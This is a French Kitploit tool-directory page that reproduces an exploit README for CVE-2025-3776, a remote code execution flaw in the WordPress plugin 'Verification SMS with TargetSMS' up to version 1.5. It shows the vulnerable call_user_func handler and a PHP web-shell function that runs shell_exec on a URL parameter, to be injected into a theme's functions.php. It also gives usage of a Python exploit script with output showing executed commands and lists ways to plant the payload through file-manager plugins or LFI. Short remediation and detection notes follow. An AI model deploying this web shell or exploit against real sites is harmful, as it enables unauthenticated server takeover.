Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-3776 — WordPress Verification SMS with TargetSMS Plugin <= 1.5 est vulnérable à l'exécution de code à distance (RCE) | Kitploit
Outils/GitHubGitHub/nxploited/cve-2025-3776
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2025-3776

CVE-2025-3776

WordPress Verification SMS with TargetSMS Plugin <= 1.5 est vulnérable à l'exécution de code à distance (RCE)

Voir le dépôt
711il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-3776 - Exécution de code à distance dans le plugin "Verification SMS with TargetSMS" <= 1.5

Informations sur le plugin

  • Nom du plugin : Verification SMS with TargetSMS
  • Versions vulnérables : <= 1.5
  • ID CVE : CVE-2025-3776
  • Type : Exécution de code à distance (RCE)
  • Classification OWASP : A1 : Injection
  • Sévérité CVSS : 10.0 (Critique)
  • Privilèges requis : Non authentifié
  • Date de publication : 23 avril 2025

Cause racine : Erreur de programmation

La vulnérabilité provient de l'utilisation de call_user_func() sur une entrée contrôlée par l'utilisateur sans assainissement par rapport à une liste blanche de fonctions autorisées. Cela crée une faille logique où n'importe quelle fonction PHP existante en mémoire peut être exécutée sans authentification, conduisant à une condition sévère d'exécution de code à distance (RCE).

Emplacement du code vulnérable

Fichier : /inc/ajax.php

root@kitploit:~
add_action('wp_ajax_nopriv_targetvrHHndler', 'targetvr_ajax_handler');

function targetvr_ajax_handler(){
    $callback = targetvr_get_postData('callback', 'string');

    if ($callback and function_exists($callback)){
        call_user_func($callback);
    } else {
        targetvr_return_json(false);
    }

    wp_die();
}

Ce code permet à des utilisateurs non authentifiés de déclencher n'importe quelle fonction présente en mémoire, y compris des fonctions malveillantes si l'attaquant parvient à les charger.


Comment tester cette vulnérabilité

✅ Prérequis

Pour exploiter cette vulnérabilité avec succès, une fonction appelable doit déjà exister dans l'environnement WordPress. Comme les plugins et thèmes WordPress peuvent charger automatiquement des fonctions, l'attaquant peut injecter sa propre fonction via le fichier functions.php du thème actif.

📍 Fichier à modifier :

root@kitploit:~
target.com/wp-content/themes/twentytwentyfour/functions.php

🛠️ Injectez la charge utile suivante à la fin de functions.php :

root@kitploit:~
function evil() {
    if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        echo '<pre>' . shell_exec("whoami") . '</pre>';
    }
    exit;
}

✅ Cela garantit que la fonction evil() est chargée en mémoire et devient exécutable via call_user_func().


Étapes d'exploitation avec un script Python

✅ Utilisation :

root@kitploit:~
python3 CVE-2025-3776.py -u http://target.com -c "id"

✅ Exemple de sortie :

root@kitploit:~
[*] Checking plugin version...
[+] Plugin version detected: 1.5
[+] Plugin is vulnerable. Proceeding with exploitation...
[*] Sending exploit request...
[+] Exploit succeeded!
<pre>uid=1(daemon) gid=1(daemon) groups=1(daemon)</pre>

Exploit By : Nxploited ( Khaled Alenazi )

Menu d'aide du script Python :

root@kitploit:~
usage: CVE-2025-3776.py [-h] -u URL [-c CMD]

CVE-2025-3776 Exploit for TargetSMS Plugin <= 1.5

# Exploit by Nxploited ( Khaled Alenazi )

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target WordPress site URL
  -c, --cmd CMD  Command to execute (default: whoami)

Comportement sans injection

Si aucune fonction evil() ou similaire n'est disponible en mémoire :

  • La requête retournera :
root@kitploit:~
{"status":false}
  • Cela signifie que la fonction de rappel n'existe pas et que l'exploit échoue en toute sécurité.

Voies d'exploitation réelles

  • Injection dans un fichier de thème : Modifier le fichier functions.php du thème actif (comme démontré).
  • Via des plugins de gestion de fichiers : Utiliser un plugin tel que WP File Manager pour téléverser un fichier PHP contenant evil().
  • Via des failles LFI ou d'inclusion : Utiliser une inclusion locale de fichier (LFI) existante pour inclure un fichier téléversé contenant une fonction malveillante.

Risques et impact

Une fois qu'une fonction malveillante est chargée, un attaquant non authentifié peut :

  • Exécuter des commandes shell arbitraires
  • Consulter des fichiers sensibles du serveur
  • Pivoter vers une compromission complète du site ou du serveur

Recommandation

  • Désactiver ou supprimer immédiatement le plugin si la version exécutée est <= 1.5
  • Restreindre l'accès à l'édition de fichiers via wp-admin
  • Corriger ou remplacer le plugin par des alternatives sécurisées

Détection

Recherchez des requêtes POST répétées vers :

root@kitploit:~
/wp-admin/admin-ajax.php?action=targetvrHHndler

Avec callback=evil ou tout autre nom de fonction inattendu


Avertissement légal

Ces informations sont fournies à des fins éducatives et de recherche éthique uniquement. L'auteur n'est pas responsable de tout usage abusif ou dommage causé par l'utilisation de ces informations.


Attribution de l'exploit

Exploit par : Nxploited (Khaled Alenazi)

Télécharger l’outil